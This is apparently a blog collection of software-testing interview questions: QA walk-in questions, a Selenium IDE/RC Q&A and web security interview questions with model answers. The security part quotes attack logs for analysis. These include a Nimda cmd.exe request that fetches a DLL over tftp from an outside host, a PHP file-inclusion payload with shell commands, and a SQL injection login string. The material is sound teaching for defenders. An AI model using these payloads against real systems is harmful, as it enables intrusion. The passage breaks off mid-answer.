
Knowledge Work Book – Interview Question Bank(QA)

August 24, 2012

Company: Cybage Software [An SEI-CMMI Level 5 assessed &  V1.3 Company]  www.cybage.com

Interview Type: Walk-in/Referral walk-in

Date: 11th August 2012

Venue: CT1, Kalyaninagar, PUNE

Rakesh Hansalia (QA, Cybage, Gandhinagar )  http://www.linkedin.com/in/rakeshhansalia
Below are the questions which were asked to the candidates in the walk-in interview for QA position:

1)      Describe yourself

2)      Describe your current project?

3)      Which is the android latest version?

4)      What is the difference between Android 2.1 and Android 2.2?

5)      OOPs concepts.

6)      Difference between a class and an interface.

7)      Different version control.

8)      SQL queries.

9)      Do you have any idea of join in sql?

10)  Test case format

11)  What are smoke, regression and functional testing?

12)  Bug Life cycle

13)  What is equivalence partitioning?

14)  How to identify an object in selenium and QTP?

15)  How to display a message in Selenium?

16)  Different views in QTP.

17)  Different modes in QTP.

18)  What is test automation framework?

19)  What are different types of automation frameworks?

20)  How you do security testing for an application?

21)  What content you include in test status report?

22)  How you have mentored your team? ( This question is applicable if you have written in your CV that you have mentored)

23)  Have you prepared test plan? If yes, then what content you include in test plan?

24)  Would you like to ask any questions from us?

25)  Describe application certification testing.

26)  How you do certification testing?

27)  What role you are playing in your current company?

28)  What are the differences and similarity between the mobile app which you are testing in your current project with the app if you tested it on windows?

29)  Difference between System testing and Functional testing.

30)  3 most important test scenarios for a pen.

31)  3 least important test scenarios for a pen from user point of view.

32)  Suppose 100 requirements are there, how will you estimate them?

33)  Suppose 1000 tcs are there, will you run all 1000 tcs on all devices?

34)  3 assert commands.

35)  Difference between Selenium Web driver, RC and IDE.

36)  Rate yourself for automation.

37)  What are the components of QTP?

38)  Do you have knowledge of sql?

39)  What is compatibility testing? Is compatibility testing functional or non functional?

40)  What is non-functional testing?

41)  Relate usability and reliability with your current project.

42)  Suppose somebody is not comfortable with you in your team and he/she does not tell anybody what he/she feels but you know that your peer is not comfortable then what will you do?

43)  If you have mentioned hobbies in your resume, then they can ask you questions related to your hobbies.

44)  Do you have any questions which you want to ask?

45)  What is root cause analysis?

46)  3 scenarios for which you as a tester can’t do root cause analysis or help the developer to know the reason for a bug?

47)  Write a C program to create a pattern:

1
2 2
3 3 3

48) What is stdio.h?

49) What is a library?

50) Tell me the names of 3 libraries.

51) Tell me the names of 5 automation tools for mobile.

52) Suppose you are the only resource and work is of 3 days and you have to complete it in 2 days, then what will you do?

53) Suppose you have to select device for an application which should work on latest as well as previous Android versions, then which device will you select?

54) What is polymorphism?

Interview Questions @ Polaris

June 27, 2012

a. Interview Date: 29-05-2010
b. Company Name: Polaris
c. Location: Hyderabad

I faced the following questions in the Polaris interview.

1. Tell me about your current organization
2. What is Black box testing?
3. What is white box testing?
4. What is Functional Testing?
5. What is the difference between Black box & functional
6. What is test plan?
7. What is test strategy?
8. What is the difference between Test plan & test strategy?
9. What is smoke testing
10. What is sanity testing?
11. Who will perform smoke testing?
12. Explain about Agile process?
13. How much do you know about QTP? (I mentioned in my resume as Exposure on QTP)
14. Explain about your current project?
15. What is the Requirement Traceability Matrix?
16. Can you draw the template for Requirement Traceability Matrix?
17. What is Ad-hoc Testing?
18. What is the difference between ReTesting and Regression Testing.
19. Can you explain about Bug life cycle?
20. How can you make sure whether all requirements are covered or not?
21. Can you explain the biggest complexity in the current project?
22. What is the difference between bug severity and priority?
23. Which bug tracking tool are you using?
24. Can you give one example for High severity and low priority bug?
25. Can you give one example for High priority and low severity bug?
26. What is security Testing?

Selenium IDE Interview Questions & Answers -Rakesh Hansalia

1. What do you know about Selenium?
Selenium is a suite of tools for web automation testing. Selenium first came to life in 2004 when Jason Huggins was testing an internal application at ThoughtWorks. Although Selenium was a tremendous tool, it wasn’t without its drawbacks: because of its JavaScript-based automation engine and the security limitations browsers apply to JavaScript, some things became impossible to do.
Selenium Suite of projects includes:
Selenium IDE
Selenium Core
Selenium 1 (known as Selenium RC or Remote Control)
Selenium 2 (known as Selenium Web driver)
Selenium-Grid

 

2. What are the technical challenges with selenium?

As you know, Selenium is a freeware, open source testing tool. There are many challenges with Selenium.

–>Selenium supports only web based applications
–>It doesn’t support any non web based (like Win 32, Java Applet, Java Swing, .Net Client Server etc) applications
–>When you compare Selenium with QTP, Silk Test, Test Partner and RFT, there are many challenges in terms of maintainability of the test cases
–>Since Selenium is a freeware tool, there is no direct support if one is in trouble with the support of applications
–>There is no object repository concept in Selenium, so maintainability of the objects is very high
–>There are many challenges if one has to interact with Win 32 windows even when working with web based applications
–>Bitmap comparison is not supported by Selenium
–>For any reporting related capabilities, you need to depend on third party tools
–>You need to learn one of the supported languages (.Net, Java, Perl, Python, PHP, Ruby) to work efficiently with the scripting side of Selenium

 

3. What are the test types supported by Selenium?

Selenium could be used for testing the web based applications.

The test types can be supported are:

1. Functional,
2. Regression,
3. Load testing

The automation tool could be implemented for post release validation with continuous integration tools like:
1. Jenkins,
2. Hudson,
3. Quick Build
4. CruiseCont

 

4. What are the capabilities of Selenium IDE?

Selenium IDE (Integrated Development Environment) works similarly to commercial tools like QTP, Silk Test and Test Partner. The points below describe Selenium IDE.

1. Selenium IDE is a Firefox add-on.
2. Selenium IDE can record clicks, typing, and other actions to make test cases.
3. Using Selenium IDE, a tester can play back the test cases in the Firefox browser.
4. Selenium IDE supports exporting the test cases and suites to Selenium RC.
5. Step-by-step debugging of the test cases can be done.
6. Breakpoint insertion is possible.
7. Page abstraction functionality is supported by Selenium IDE.
8. Selenium IDE is extensible, allowing the use of add-ons or user extensions that expand its functionality.

 

5. What are the challenges with Selenium IDE?

Selenium-IDE does not directly support:

1. Condition statements
2. Iteration or looping
3. Logging and reporting of test results
4. Error handling, particularly unexpected errors
5. Database testing
6. Test case grouping
7. Re-execution of failed tests
8. Test case dependency
9. Capture screenshots on test failures
10. Results Report generations

 

6. Which are the browsers supported by Selenium IDE?

Selenium IDE supports only one browser Mozilla Firefox. The versions supported as of now are:

Mozilla Firefox 2.x
Mozilla Firefox 3.x

The versions not supported as of now are:
earlier versions of Mozilla Firefox 2.x
Mozilla Firefox 4.x

 

7. How to execute a single line command from Selenium IDE?

Single line command from Selenium IDE can be executed in two ways

1. Right click on the command in Selenium IDE and select “Execute This Command”
2. Select the command in Selenium IDE and press “X” key on the keyboard

 

8. How to insert a start point in Selenium IDE?

Start point Selenium IDE can be set in two ways

1. Right click on the command in Selenium IDE and select “Set / Clear Start Point”
2. Select the command in Selenium IDE and press “S” key on the keyboard
3. You can have only one start point
4. If you have already set one start point and you selected other command as start point. Then the first start point will be removed and the new start point will be set

 

9. How to insert a comment in Selenium IDE?

Comments in Selenium IDE can be set in two ways

1. Right click on the command in Selenium IDE and select “Insert New Comment”
2. If you want to comment out an existing line, follow the steps below.

a. Select the Source tab in the IDE
b. Select the line which you want to comment out
c. For example, to comment out an open command, wrap its cells in an HTML comment as shown below

<tr>
<!--
<td>open</td>
<td>/node/304/edit</td>
<td></td>
-->
</tr>

 

10. How to insert a break point in Selenium IDE?

Break point can be set in two ways in Selenium IDE

1. Right click on the command in Selenium IDE and select “Toggle Break Point”
2. Select the command in Selenium IDE and press “B” key on the keyboard
3. If you want to clear the break point, press the “B” key on the keyboard once again
4. You can set multiple break points in Selenium IDE

 

11. How to debug the tests in Selenium IDE?

To debug or execute the test cases line by line, follow the steps below

1. Insert a break point at the location from which you want to execute step by step
2. Run the test case
3. Execution will be paused at the given break point
4. Click on the step (Blue) button to continue with the next statement
5. Click on Run button, to continue executing all the commands at a time

 

12. How to export the tests from Selenium IDE to Selenium RC in different languages?

From selenium IDE the test cases can be exported into the languages

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The below mentioned steps can explain how to export the test cases

1. Open the test case from Selenium IDE
2. Select File -> Export Test Case As

 

13. How to export Selenium IDE Test Suite to Selenium RC Suites?

From selenium IDE the test suites can be exported into the languages as mentioned below

1. .Net
2. Java
3. Perl
4. Python
5. PHP
6. Ruby

The below mentioned steps can explain how to export the test suites

1. Open the test case from Selenium IDE
2. Select File -> Export Test Suite As

 

14. Which is the command used for displaying the values of a variable into the output console or log?

The command used for displaying the values of a variable into the output console or log – echo

If you want to display a constant string. The below mentioned command can be used
echo <constant string>
ex: echo “The sample message”

If you want to display the value of a variable it can be written like below
echo ${<variable name>}

ex: echo ${var1}

Note: Here var1 is the variable

 

15. Which are the browsers supported by Selenium RC?

Supported browsers for Selenium RC include:

1. *firefox
2. *mock
3. *firefoxproxy
4. *pifirefox
5. *chrome
6. *iexploreproxy
7. *iexplore
8. *firefox3
9. *safariproxy
10. *googlechrome
11. *konqueror
12. *firefox2
13. *safari
14. *piiexplore
15. *firefoxchrome
16. *opera
17. *iehta
18. *custom

 

16. Which are the Operating Systems supported by Selenium?

Selenium IDE
Works in Firefox 2+ Start browser, run tests Run tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others whichever supports Firefox 2+

Selenium Remote Control
Used for starting browser and run tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

Selenium Core
Used for running tests
Operating Systems Supported:

1. Windows,
2. OS X
3. Linux
4. Solaris
5. Others

 

17. What is Selenium RC?

Selenium-RC is the solution for tests that need a little more than just simple browser actions and a linear execution. Selenium-RC leverages the full power of programming languages, creating tests that can do things like read and write external files, make queries to a database, send emails with test reports, and practically anything else a user can do with a normal application.

You will want to use Selenium-RC whenever your test requires logic not supported by running a script from Selenium-IDE

 

18. Why Selenium RC is used?

Selenium-IDE does not directly support:

1. condition statements
2. iteration
3. logging and reporting of test results
4. error handling, particularly unexpected errors
5. database testing
6. test case grouping
7. re-execution of failed tests
8. test case dependency
9. capture screenshots on test failures

Selenium IDE does not support the above mentioned requirements because the IDE supports only HTML, and HTML has no conditionals, loops or connections to external sources.

To overcome the above mentioned problems, Selenium RC is used.

Selenium RC supports the languages .Net, Java, Perl, Python, PHP, and Ruby, and in these languages we can write programs that work around the IDE issues.

 

19. Which are the languages supported by Selenium RC?

The languages supported by Selenium RC

1. .Net,
2. Java (JUnit 3, JUnit 4, TestNG, Groovy)
3. Perl,
4. Python,
5. PHP,
6. Ruby

 

20. What is Selenium Grid?

Selenium Grid is part of the Selenium suite of projects. Selenium Grid transparently distributes your tests on multiple machines so that you can run your tests in parallel, cutting down the time required for running in-browser test suites. This dramatically speeds up in-browser web testing, giving you quick and accurate feedback you can rely on to improve your web application.

 

21. What is Selenium WebDriver or Google WebDriver or Selenium 2.0?

WebDriver uses a different underlying framework from Selenium’s javascript Selenium-Core. It also provides an alternative API with functionality not supported in Selenium-RC. WebDriver does not depend on a javascript core embedded within the browser, therefore it is able to avoid some long-running Selenium limitations.

WebDriver’s goal is to provide an API that establishes
• A well-designed standard programming interface for web-app testing.
• Improved consistency between browsers.
• Additional functionality addressing testing problems not well-supported in Selenium 1.0.

The Selenium developers strive to continuously improve Selenium. Integrating WebDriver is another step in that process. The developers of Selenium and of WebDriver felt they could make significant gains for the Open Source test automation community by combining forces and merging their ideas and technologies. Integrating WebDriver into Selenium is the current result of those efforts.

 

22. What are the capabilities of Selenium WebDriver or Google WebDriver or Selenium 2.0?

One should use WebDriver when requiring improved support for

• Multi-browser testing including improved functionality for browsers not well-supported by Selenium-1.0.
• Handling multiple frames, multiple browser windows, popups, and alerts.
• Page navigation.
• Drag-and-drop.
• AJAX-based UI elements.

 

23. What is the architecture of Selenium RC?

The Selenium Server which launches and kills browsers, and acts as an HTTP proxy for browser requests.

Client libraries for various programming languages, each of which instructs the Selenium Server in how to test the AUT by passing it your test script’s Selenium commands.

The diagram shows the client libraries communicate with the Server passing each Selenium command for execution. Then the server passes the Selenium command to the browser using Selenium-Core JavaScript commands. The browser, using its JavaScript interpreter, executes the Selenium command, which effectively, runs the check you specified in your Selenese test script.

 

24. What is the architecture of Selenium Grid?

The below mentioned theory explains about the setup of Selenium Grid with architecture and how it works.

Selenium Grid builds on the traditional Selenium setup, taking advantage of the following properties:

* The Selenium test, the application under test, and the remote control/browser pair do not have to be co-located. They communicate through HTTP, so they can all live on different machines.
* The Selenium tests and the web application under test are obviously specific to a particular project. Nevertheless, neither the Selenium remote control nor the browser is tied to a specific application. As a matter of fact, they provide a capacity that can easily be shared by multiple applications and multiple projects.

Consequently, if only we could build a distributed grid of Selenium Remote Controls, we could easily share it across builds, applications, projects – even potentially across organizations. Of course we would also need to address the scalability issues as described earlier when covering the traditional Selenium setup. This is why we need a component in charge of:

* Allocating a Selenium Remote Control to a specific test (transparently)
* Limiting the number of concurrent test runs on each Remote Control
* Shielding the tests from the actual grid infrastructure

Selenium Grid calls this component the Selenium Hub.

* The Hub exposes an external interface that is exactly the same as the one of a traditional Remote Control. This means that a test suite can transparently target a regular Remote Control or a Selenium Hub with no code change. It just needs to target a different IP address. This is important as it shields the tests from the grid infrastructure (which you can scale transparently). This also makes the developer’s life easier. The same test can be run locally on a developer machine, or run on a heavy duty distributed grid as part of a build – without ever changing a line of code.
* The Hub allocates Selenium Remote Controls to each test. The Hub is also in charge of routing the Selenese requests from the tests to the appropriate Remote Control as well as keeping track of testing sessions.
* When a new test starts, the Hub puts its first request on hold if there is no available Remote Control in the grid providing the appropriate capabilities. As soon as a suitable Remote Control becomes available, the Hub will serve the request. For the whole time, the tests do not have to be aware of what is happening within the grid; it is just waiting for an HTTP response to come back.

 

25. Does Selenium support mobile internet testing?

Selenium supports Opera, and Opera is used in most smart phones. So whichever smart phone supports Opera, Selenium can be used to test it. So, one can use Selenium RC to run the tests on mobiles.

 

26. Does Selenium support Google Android Operating System?

Yes, Selenium Web Driver or Google Web Driver or Selenium 2.0 supports Android Operating System. There are several libraries written to support Android Operating System.

 

27. What are the types of text patterns available in Selenium?

There are three types of patterns available in Selenium
1. globbing
2. regular expressions
3. exact

 

28. How to use regular expressions in Selenium?

Regular expressions in Selenium IDE are used by adding the keyword regexp: as a prefix to the value, followed by a pattern that matches the expected values.

For example if you want to use the regular expression for a command
Command: verifyText
Target: //font/font/b/font[1]
Value: Flight Confirmation # 2011-05-02451

In the above example, the Flight Confirmation number changes each time you run the test case. So this can be written with a regular expression as mentioned below

Command: verifyText
Target: //font/font/b/font[1]
Value: regexp:Flight Confirmation # [0-9]{4}-[0-9]{2}-[0-9]{5,10}

 

29. What are the regular expression patterns available in Selenium?

Selenium regular expression patterns offer the same wide array of special characters that exist in JavaScript. Below is a subset of those special characters

PATTERN    MATCH
.          any single character
[ ]        character class: any single character that appears inside the brackets
*          quantifier: 0 or more of the preceding character (or group)
+          quantifier: 1 or more of the preceding character (or group)
?          quantifier: 0 or 1 of the preceding character (or group)
{1,5}      quantifier: 1 through 5 of the preceding character (or group)
|          alternation: the character/group on the left or the character/group on the right
( )        grouping: often used with alternation and/or quantifier

 

30. What is Selenese?

The set of Selenium commands used for running tests is called Selenese.

There are three types of Selenese, those are:
1. Actions – used for performing the operations and interactions with the target elements
2. Assertions – used as check points
3. Accessors – used for storing the values in a variable

 

31. How do you add check points or verification points in Selenium?

Check points or verification points are known as Assertions in Selenium. Keywords with the prefixes below are used for adding check points or verification points.

1. verify
2. assert
3. waitFor

 

32. What is Assertion in Selenium?

Assertion is nothing but a check or verification point.

Assertion verifies the state of the application conforms to what is expected.
Examples include “make sure the page title is X” and “verify that this checkbox is checked”.

 

33. What are the types of Assertions there in Selenium?

Selenium Assertions can be used in 3 modes:

1) assert – When an “assert” fails, the test will be aborted. If you are executing a test suite, the next test case will start

2) verify – When a “verify” fails, the test will continue execution, logging the failure.

3) waitFor – “waitFor” commands wait for some condition to become true (which can be useful for testing Ajax applications). They will succeed immediately if the condition is already true. However, they will fail and halt the test if the condition does not become true within the current timeout setting

 

34. When to use Assert, Verify and WaitFor in Selenium?

1) assert – If the expected value is mandatory to continue with the next set of steps we will use Assert. As Assert aborts the test, if the expected value doesn’t match. It is good to use for any mandatory checks.

2) verify – If the expected value is optional to continue with the next set of steps we will use Verify. As Verify continues executing with the next set of steps, if the expected value doesn’t match. It is good to use for any optional checks.

3) waitFor – If your test needs to wait, if the expected value is not matching we use waitFor. We normally use waitFor for AJAX kind of controls loading within a page

 

35. What is an Accessor in Selenium?

Accessor is one of the types of Selenese.

I. Accessors are used for storing the value of a target in a variable.

Ex:
1) storeTitle – Stores the title of a window in a variable

2) storeText – Stores the target element text in a variable

II. Accessors are also used for evaluating the result and storing the result in a variable

Ex: storeTextPresent – Evaluates whether the text is present in the current window. If the text is present stores true in the variable else stores false

Ex: storeElementPresent – Evaluates whether the element is present in the current window. If the element is present stores true in the variable else stores false

 

36. When to use Accessors in Selenium?

Accessors are mostly used for storing the value in a variable.

The variable can be used for following reasons:

1) To get the value from an element and comparing with some dynamic value

2) To take a logical decision to execute the test steps
ex: if the value of the variable true execute step1 and step2 else step3 and step4

3) To execute some statements in a loop based on the value returned by the element

 

37. How to capture bitmaps in Selenium?

Bitmaps are captured using the Selenium set of commands. There are two modes of capturing the bitmaps

1) Capture the bitmap for the entire page – it captures the browser main page area of AUT
2) Capture the bitmap for the screen shots – it captures the entire screen, like the Print Screen key on your keyboard

Selenium doesn’t support bitmap capturing for an element on AUT.

 

38. Which are the commands used for capturing the bitmaps?

captureEntirePageScreenshot
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see captureEntirePageScreenshot for more details

captureEntirePageScreenshotAndWait
Saves the entire contents of the current window canvas to a PNG file. Contrast this with the captureScreenshot command, which captures the contents of the OS viewport (i.e. whatever is currently being displayed on the monitor), and is implemented in the RC only. Currently this only works in Firefox when running in chrome mode, and in IE non-HTA using the EXPERIMENTAL “Snapsie” utility. The Firefox implementation is mostly borrowed from the Screengrab! Firefox extension. Please see
captureEntirePageScreenshotAndWait for details.

Note: This command runs only with Mozilla Firefox when you run the tests from RC. Other browsers are not supported

 

39. What is the difference between captureEntirePageScreenshot and CaptureScreenShot?

captureEntirePageScreenshot
1. This captures the AUT web page only
2. This supports only mozilla firefox
3. Accepts two arguments. one is the file name to be saved and other argument is back ground color

CaptureScreenShot

1. This captures the System screen shot
2. This supports all the browsers when you run from Selenium RC
3. Accepts one argument. That is the file name to be saved.

 

40. How do you set user extensions in Selenium IDE?

1. Open user-extensions.js with an editor (Notepad, etc.); it’s found in the selenium\core\scripts folder. If it doesn’t exist, just create it.
2. If you need to, commit the user-extensions.js file (like if you use subversion).
3. Open Selenium IDE and choose the Options menu and then Options… from that menu.
4. Make sure the path to your user-extensions.js file is entered in the Selenium Core extensions field (like \selenium\core\scripts\user-extensions.js)
5. Press OK button on options
6. Restart the IDE to reflect your extensions.

Note: After reopening, Selenium IDE may show compilation errors if the user-extensions.js file has any syntax errors.

 

41. What are the limitations of Selenium IDE

The limitations of Selenium IDE are:

1) Selenium IDE uses only HTML language
2) Conditional or branching statements execution like using of if, select statements is not possible
3) Looping statements cannot be used directly in the Selenium HTML language in the IDE
4) Reading from external files like .txt, .xls is not possible
5) Reading from the external databases is not possible with ide
6) Exceptional handling is not there
7) A neat formatted Reporting is not possible with ide

To eliminate the above issues we use Selenium RC

 

Web Security Interview Questions

April 30, 2012

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions.  These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

 

Entry Level Questions

 

  1. What do you see as the most critical and current threats affecting Internet accessible websites?

 

Goal of question – To gauge the applicant’s knowledge of current web related threats.  Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics.  Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

 

 

  2. What online resources do you use to keep abreast of web security issues?  Can you give an example of a recent web security vulnerability or threat?

 

Goal of question – Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT.  Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications, which are in wide use (awstats scripts) are acceptable.

 

  3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

 

Goal of question – We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

 

  • Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
  • Proper logging – increasing the verboseness of logging (Mod_Security audit_log)
  • Remote Centralized Logging
  • Alerting Mechanisms
  • Updating Signatures/Policies

 

 

  4. What is your definition of the term “Cross-Site Scripting”?  What is the potential impact to servers and clients?

 

Goal of question – This question will determine if the applicant is well versed in the terminology used in web security.  The applicant needs to be able to articulate highly technical topics to a wide audience.  The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information.  WASC has a web security glossary of terms that may be of help – http://www.webappsec.org/glossary.html

 

 

Cross-Site Scripting: (Acronym – XSS) An attack technique that forces a web site to echo client-supplied data, which execute in a user’s web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client.  The web server is merely used as a conduit for the XSS data to be presented to the end client. See also “Client-Side Scripting”.
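The echo behaviour in the definition above, shown beside its corrected form, as an added example that is not part of the original post. The function names, the q parameter, the cookie value and the header values are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs


def render_vulnerable(query):
    # Echoes client-supplied data into the page unchanged: the behaviour the
    # glossary definition describes.
    return "<p>Results for " + query + "</p>"


def render_hardened(query):
    # Encode for the HTML context before echoing. quote=True also encodes
    # quotes, so the value is safe inside a double-quoted attribute.
    safe = html.escape(query, quote=True)
    return ('<p>Results for ' + safe + '</p>'
            '<input name="q" value="' + safe + '">')


def app(environ, start_response):
    # Minimal WSGI handler (hypothetical application) using the hardened
    # renderer plus two defence-in-depth response headers.
    params = parse_qs(environ.get("QUERY_STRING", ""))
    query = params.get("q", [""])[0]
    body = render_hardened(query).encode("utf-8")
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        # Restricts which scripts the browser will run on this page.
        ("Content-Security-Policy", "default-src 'self'; script-src 'self'"),
        # HttpOnly keeps the session cookie out of reach of page scripts.
        ("Set-Cookie",
         "session=constructed-value; HttpOnly; Secure; SameSite=Lax"),
        ("Content-Length", str(len(body))),
    ]
    start_response("200 OK", headers)
    return [body]


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"  # constructed test input
    print(render_vulnerable(probe))
    print(render_hardened(probe))
```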

 

 

  5. What are the most important steps you would recommend for securing a new web server? Web application?

 

Goal of question – Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

 

Web Server Security:

  • Update/Patch the web server software
  • Minimize the server functionality – disable extra modules
  • Delete default data/scripts
  • Increase logging verboseness
  • Update Permissions/Ownership of files

 

Web Application Security:

  • Make sure Input Validation is enforced within the code – Security QA testing
  • Configured to display generic error messages
  • Implement a software security policy
  • Remove or protect hidden files and directories

 

 

Advanced Level Questions

 

  1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server.  What do the log entries below suggest has happened?  What would you do in response to these entries?

 

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"

68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

 

Goal of question – To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF).  In this scenario, the client system (68.48.142.117) is infected with the Nimda worm.  These requests will not affect our Apache proxy server since this is a Microsoft vulnerability.  While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200).  The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful.  Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

 

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

 

You could use either Microsoft’s Internet Security and Acceleration (ISA) Server as a front-end proxy or implement URLScan on the target IIS server.  The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.
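The log reading described in this answer can be automated. The following is an added example, not part of the original question set: it parses a Common Log Format line, normalises the request (percent-decoding and lower-casing) and separates a rejected probe from an accepted one and from the follow-up TFTP request. The verdict names, function names and the third sample line are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

enum verdict { UNPARSED, BENIGN, PROBE_REJECTED, PROBE_ACCEPTED, STAGE2_DOWNLOAD };

/* The two entries from the question, plus one constructed line (encoded name, 404). */
static const char *SAMPLES[] = {
    "68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 200 566 \"-\" \"-\"",
    "68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] \"GET /c/winnt/system32/cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\\\httpodbc.dll HTTP/1.0\" 200 566 \"-\" \"-\"",
    "192.0.2.10 - - [09/Mar/2004:22:25:01 -0500] \"GET /c/winnt/system32/CMD%2eEXE?/c+dir HTTP/1.0\" 404 310 \"-\" \"-\"",
};

/* Percent-decode and lower-case s into out (at most cap-1 bytes plus NUL). */
static void decode_lower(const char *s, char *out, size_t cap) {
    size_t o = 0;
    unsigned int b;
    while (*s && o + 1 < cap) {
        if (*s == '%' && isxdigit((unsigned char)s[1]) &&
            isxdigit((unsigned char)s[2]) && sscanf(s + 1, "%2x", &b) == 1)
            s += 3;
        else
            b = (unsigned char)*s++;
        out[o++] = (char)tolower((int)b);
    }
    out[o] = '\0';
}

/* Classify one CLF line by its quoted request and the status code after it. */
enum verdict triage_clf(const char *line) {
    char req[512], dec[512];
    int status;
    const char *q1 = strchr(line, '"');
    const char *q2 = q1 ? strchr(q1 + 1, '"') : NULL;
    if (!q2 || (size_t)(q2 - q1) > sizeof req || sscanf(q2 + 1, " %d", &status) != 1)
        return UNPARSED;               /* no quoted request, too long, or no status */
    memcpy(req, q1 + 1, (size_t)(q2 - q1 - 1));
    req[q2 - q1 - 1] = '\0';
    decode_lower(req, dec, sizeof dec);
    if (!strstr(dec, "cmd.exe")) return BENIGN;
    if (status < 200 || status > 299) return PROBE_REJECTED;
    /* A 2xx answer means something executed the request: inspect the backend. */
    return strstr(dec, "tftp") ? STAGE2_DOWNLOAD : PROBE_ACCEPTED;
}

int main(void) {
    for (size_t i = 0; i < sizeof SAMPLES / sizeof *SAMPLES; i++)
        printf("verdict %d: %.70s\n", triage_clf(SAMPLES[i]), SAMPLES[i]);
    return 0;
}
```

Matching on the raw request line would miss the third sample, which is why the request is normalised before the substring checks.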

 

 

  2. You are engaged in a penetration test where you are attempting to gain access to a protected location.  You are presented with this login screen:

What are some examples of how you would attempt to gain access?

 

Goal of question – Determine if the applicant has a wide knowledge of different authentication vulnerabilities.  They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as – ‘ OR 1=1#).  If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

 

ODBC Error Code = 37000 (Syntax error or access violation)

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.

Data Source = "ECommerceTheArchSupport2"

SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId <> 0 AND QuickJumpId ="

The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file K:\InetPub\clients\login\http\ailment.cfm

The specific sequence of files included or processed is:
K:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

 

This error message indicates that the target web application is running Microsoft SQL Server and discloses directory structures.

 

 

  3. What application generated the log file entry below?  What type of attack is this?  Assuming the index.php program is vulnerable, was this attack successful?

 

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 -0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: http://www.foo.com
Connection: keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

 

 

Goal of question – To verify that the applicant can interpret various web log files, identify attacks and possible impacts.  The Mod_Security Apache module generated this data in the audit_log file.  The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script.  The commands being passed are in the POST PAYLOAD of the request.  This attack was not successful for the following two reasons:

 

  • The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the “uname -a” data in the POST PAYLOAD.
  • The attacker also made a typo in the OS commands being passed in the POST PAYLOAD.  She did not include a semicolon “;” between the ls and uname commands.  The target host would fail to execute the “lsuname” command.

 

 

  4. One of your web servers is logging multiple requests similar to the following:

 

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "Microsoft Data Access Internet Publishing Provider DAV 1.1" "-"

What does this log entry indicate?  How could you identify what the contents are of the “hacked.htm” file that the attacker is trying to upload?

 

Goal of question – Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT method) and the logging limitations of CLF.  In this type of attack, the defacement text is sent in the request body and not on the URL request line.  To identify this data, a network sniffing application would need to be used.  An application such as Snort could be used with a custom rule to identify this activity.  Here is an example rule –

 

